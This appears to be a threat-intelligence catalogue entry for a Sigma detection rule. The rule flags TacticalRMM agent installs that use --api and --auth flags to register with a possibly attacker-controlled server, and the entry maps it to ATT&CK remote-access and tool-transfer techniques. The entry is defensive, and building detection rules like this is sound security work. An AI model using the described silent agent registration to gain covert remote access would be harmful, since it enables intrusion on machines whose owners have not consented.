Skip to content

Hide Navigation Hide TOC

Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e)

Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.

Cluster A Galaxy A Cluster B Galaxy B Level
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e) Sigma-Rules Remote Access Tools - T1219 (4061e78c-1284-44b4-9116-73e4ac3912f7) Attack Pattern 1
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server (2db93a3f-3249-4f73-9e68-0e77a0f8ae7e) Sigma-Rules Ingress Tool Transfer - T1105 (e6919abc-99f9-4c6c-95a5-14761e7b2add) Attack Pattern 1